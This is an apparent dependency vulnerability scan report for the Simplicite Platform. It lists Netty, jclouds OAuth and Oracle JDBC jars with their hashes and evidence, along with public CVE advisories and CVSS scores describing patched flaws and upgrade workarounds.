CVE-2021-21290 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. On unix-like systems, the temporary directory is shared between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method "File.createTempFile" on unix-like systems creates a random file, but, by default will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData" is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify your own "java.io.tmpdir" when you start the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions
CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2022-24823 suppress
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
netty-transport-native-kqueue-4.1.48.Final-osx-x86_64.jarDescription:
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers and clients. License:
http://www.apache.org/licenses/LICENSE-2.0 File Path: /var/simplicite/.m2/repository/io/netty/netty-transport-native-kqueue/4.1.48.Final/netty-transport-native-kqueue-4.1.48.Final-osx-x86_64.jar
MD5: 54f481effe90ff48eef20a5d0e6043f0
SHA1: 6c904f9dadbd4fa242697339a512e2c4b66f4b8c
SHA256: 8b992851ef9991b56493ab76d5c98d6958ea3045832c04dc8e2d1ca3c62f763c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name netty-transport-native-kqueue High Vendor jar package name io Highest Vendor jar package name kqueue Highest Vendor jar package name netty Highest Vendor Manifest automatic-module-name io.netty.transport.kqueue Medium Vendor Manifest bundle-docurl https://netty.io/ Low Vendor Manifest bundle-nativecode META-INF/native/libnetty_transport_native_kqueue_x86_64.jnilib; osname=MacOSX, processor=x86_64" Low Vendor Manifest bundle-symbolicname io.netty.transport-native-kqueue Medium Vendor Manifest implementation-url https://netty.io/netty-transport-native-kqueue/ Low Vendor Manifest Implementation-Vendor The Netty Project High Vendor Manifest Implementation-Vendor-Id io.netty Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor pom artifactid netty-transport-native-kqueue Highest Vendor pom artifactid netty-transport-native-kqueue Low Vendor pom groupid io.netty Highest Vendor pom name Netty/Transport/Native/KQueue High Vendor pom parent-artifactid netty-parent Low Product file name netty-transport-native-kqueue High Product jar package name io Highest Product jar package name kqueue Highest Product jar package name netty Highest Product Manifest automatic-module-name io.netty.transport.kqueue Medium Product Manifest bundle-docurl https://netty.io/ Low Product Manifest Bundle-Name Netty/Transport/Native/KQueue Medium Product Manifest bundle-nativecode META-INF/native/libnetty_transport_native_kqueue_x86_64.jnilib; osname=MacOSX, processor=x86_64" Low Product Manifest bundle-symbolicname io.netty.transport-native-kqueue Medium Product Manifest Implementation-Title Netty/Transport/Native/KQueue High Product Manifest implementation-url https://netty.io/netty-transport-native-kqueue/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product pom artifactid netty-transport-native-kqueue Highest Product pom groupid io.netty Highest Product pom name Netty/Transport/Native/KQueue High Product pom parent-artifactid netty-parent Medium Version Manifest Bundle-Version 4.1.48.Final High Version Manifest Implementation-Version 4.1.48.Final High Version pom version 4.1.48.Final Highest
Related Dependencies netty-transport-native-epoll-4.1.48.Final-linux-x86_64.jarFile Path: /var/simplicite/.m2/repository/io/netty/netty-transport-native-epoll/4.1.48.Final/netty-transport-native-epoll-4.1.48.Final-linux-x86_64.jar MD5: 5a1668504ac698fffa39c562ab932e8b SHA1: 2b25233dda8b986297076a7d62552c1ec2f41ed8 SHA256: 7436ecfb442b299af6ecff7ae6a8d3f00fb56e081d20e82b467dad2e6ee8848f pkg:maven/io.netty/netty-transport-native-epoll@4.1.48.Final CVE-2021-37136 suppress
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-37137 suppress
The Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-41881 suppress
Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder. CWE-674 Uncontrolled Recursion
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2023-44487 suppress
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-43797 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control chars when they are present at the beginning / end of the header name. It should instead fail fast as these are not allowed by the spec and could lead to HTTP request smuggling. Failing to do the validation might cause netty to "sanitize" header names before it forward these to another remote system when used as proxy. This remote system can't see the invalid usage anymore, and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2023-34462 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2021-21295 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N References:
- [bookkeeper-issues] 20210330 [GitHub] [bookkeeper] eolivelli opened a new issue #2669: Update Netty to 4.1.60.final - [flink-dev] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210426 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210511 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210610 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210618 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [hbase-commits] 20210402 [hbase-thirdparty] branch master updated: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 (#48) - [hbase-dev] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] Apache-HBase commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] HorizonNet commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell merged pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell opened a new pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Assigned] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [jackrabbit-dev] 20210709 [GitHub] [jackrabbit-oak] blackat opened a new pull request #321: Update netty to resolve CVE-2021-21295 and BDSA-2018-4022 - [kafka-dev] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-dev] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210330 [jira] [Updated] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr commented on pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr opened a new pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210401 [jira] [Commented] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210402 [jira] [Assigned] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kudu-issues] 20210904 [jira] [Created] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210904 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Commented] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Resolved] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [pulsar-commits] 20210329 [GitHub] [pulsar] aahmed-se opened a new pull request #10073: Upgrade Netty version to 4.1.60.final - [pulsar-commits] 20210329 [GitHub] [pulsar] merlimat closed issue #10071: CVE-2021-21295 & CVE-2021-21290 - [pulsar-commits] 20210329 [GitHub] [pulsar] yaswanthnadella opened a new issue #10071: CVE-2021-21295 & CVE-2021-21290 - [pulsar-commits] 20211020 [GitHub] [pulsar] Shoothzj opened a new pull request #12437: [Security] Bump grpc to 1.41.0 - [ranger-dev] 20210317 [jira] [Assigned] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295 - [ranger-dev] 20210317 [jira] [Created] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.5 updated: ZOOKEEPER-4272 ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.6 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.7 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch master updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-dev] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-dev] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210330 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Assigned] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Resolved] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210401 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210402 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, CVE-2021-34428- Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad closed pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] asfgit closed pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] eolivelli commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - https://lists.apache.org/thread.html/r04a3e0d9f53421fb946c60cc54762b7151dc692eb4e39970a7579052%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r16c4b55ac82be72f28adad4f8061477e5f978199d5725691dcc82c24%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r2e93ce23e04c3f0a61e987d1111d0695cb668ac4ec4edbf237bd3e80%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r490ca5611c150d193b320a2608209180713b7c68e501b67b0cffb925%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r57245853c7245baab09eae08728c52b58fd77666538092389cc3e882%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r6d32fc3cd547f7c9a288a57c7f525f5d00a00d5d163613e0d10a23ef%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r8bcaf7821247b1836b10f6a1a3a3212b06272fd4cde4a859de1b78cf%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r8db1d7b3b9acc9e8d2776395e280eb9615dd7790e1da8c57039963de%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/ra96c74c37ed7252f78392e1ad16442bd16ae72a4d6c8db50dd55c88b%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/racc191a1f70a4f13155e8002c61bddef2870b26441971c697436ad5d%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rae198f44c3f7ac5264045e6ba976be1703cff38dcf1609916e50210d%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rb523bb6c60196c5f58514b86a8585c2069a4852039b45de3818b29d2%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rc73b8dd01b1be276d06bdf07883ecd93fe1a01f139a99ef30ba4308c%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rcfc154eb2de23d2dc08a56100341161e1a40a8ea86c693735437e8f2%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rd25c88aad0e76240dd09f0eb34bdab924933946429e068a167adcb73%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rdb4db3f5a9c478ca52a7b164680b88877a5a9c174e7047676c006b2c%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/re4f70b62843e92163fab03b65e2aa8078693293a0c36f1cc260079ed%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/reafc834062486adfc7be5bb8f7b7793be0d33f483678a094c3f9d468%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rf87b870a22aa5c77c27900967b518a71a7d954c2952860fce3794b60%40%3Ccommits.servicecomb.apache.org%3E CONFIRM - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj CONFIRM - https://security.netapp.com/advisory/ntap-20210604-0003/ DEBIAN - DSA-4885 MISC - https://github.com/Netflix/zuul/pull/980 MISC - https://github.com/netty/netty/commit/89c241e3b1795ff257af4ad6eadc616cb2fb3dc4 MISC - https://www.oracle.com/security-alerts/cpuapr2022.html Vulnerable Software & Versions: (show all )
CVE-2021-21409 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with the endStream set to to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a followup of GHSA-wm47-8v5p-wjpj/CVE-2021-21295 which did miss to fix this one case. This was fixed as part of 4.1.61.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2021-21290 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. On unix-like systems, the temporary directory is shared between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method "File.createTempFile" on unix-like systems creates a random file, but, by default will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData" is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify your own "java.io.tmpdir" when you start the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions
CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2022-24823 suppress
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
oauth-2.2.0.jarDescription:
jclouds components to access OAuth License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/jclouds/api/oauth/2.2.0/oauth-2.2.0.jar
MD5: 8808e0e07ab9a59b59145e41cde732bd
SHA1: 693ec29e9dc563386dae46368b6da9d1f44ab048
SHA256: 75cb471ad1cc56dcca39bee1c488a2a7f571f8466c9e21d2e565891c6b736e69
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name oauth High Vendor jar package name jclouds Highest Vendor jar package name oauth Highest Vendor Manifest bundle-docurl http://www.apache.org/ Low Vendor Manifest bundle-symbolicname oauth Medium Vendor Manifest Implementation-Vendor jclouds High Vendor Manifest Implementation-Vendor-Id org.jclouds Medium Vendor Manifest specification-vendor jclouds Low Vendor pom artifactid oauth Highest Vendor pom artifactid oauth Low Vendor pom groupid org.apache.jclouds.api Highest Vendor pom name jclouds OAuth core High Vendor pom parent-artifactid jclouds-project Low Vendor pom parent-groupid org.apache.jclouds Medium Product file name oauth High Product jar package name jclouds Highest Product jar package name oauth Highest Product Manifest bundle-docurl http://www.apache.org/ Low Product Manifest Bundle-Name jclouds OAuth core Medium Product Manifest bundle-symbolicname oauth Medium Product Manifest Implementation-Title jclouds OAuth core High Product Manifest specification-title jclouds jclouds OAuth core Medium Product pom artifactid oauth Highest Product pom groupid org.apache.jclouds.api Highest Product pom name jclouds OAuth core High Product pom parent-artifactid jclouds-project Medium Product pom parent-groupid org.apache.jclouds Medium Version file version 2.2.0 High Version Manifest Bundle-Version 2.2.0 High Version Manifest Implementation-Version 2.2.0 High Version pom version 2.2.0 Highest
ojdbc8-23.3.0.23.09.jarDescription:
Oracle JDBC Driver compatible with JDK8, JDK11, JDK12, JDK13, JDK14 and JDK15 License:
Oracle Free Use Terms and Conditions (FUTC): https://www.oracle.com/downloads/licenses/oracle-free-license.html File Path: /var/simplicite/.m2/repository/com/oracle/database/jdbc/ojdbc8/23.3.0.23.09/ojdbc8-23.3.0.23.09.jar
MD5: c6f402fe18e14e384f76ede75f8dc211
SHA1: d36f44a0ed8a07dcff2afef7f12ccdbd460d053d
SHA256: 58d793f5bd0c5b074d8a9d2fd7695a36c7d5c7621bc01d2caeeb4422180ae816
Referenced In Project/Scope: Simplicite Platform:runtime
